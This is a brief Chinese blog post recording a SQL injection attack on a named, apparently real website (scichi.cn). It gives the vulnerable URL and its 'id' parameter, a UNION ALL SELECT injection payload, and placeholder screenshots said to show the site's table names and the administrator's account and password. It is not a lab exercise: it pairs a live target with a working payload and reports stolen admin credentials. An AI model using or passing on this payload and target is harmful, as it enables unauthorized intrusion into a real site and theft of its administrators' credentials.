注入漏洞1

漏洞URL:http://www.scichi.cn/blog/viewblog.php?id=708

第一步、对漏洞URL中id传参进行payload构造联合查询注入

*Payload: id=-3108 UNION ALL SELECT CONCAT(0x71787a7171,0x57474269744a427a50627850784a7243656a6a6166507446495951504274755a695763614b515875,0x716a6a7171)– —-
*

*image.png
*

第二步、获取数据库信息和管理员账号和密码

(1)表名证明

*image.png
*

(2)管理员账号和密码

*image.png
*

本文标题:注入漏洞1

文章作者:孤桜懶契

发布时间:2021年05月02日 - 18:57:10

最后更新:2021年05月02日 - 19:01:49

原始链接:https://gylq.gitee.io/2021/05/02/%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E1/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------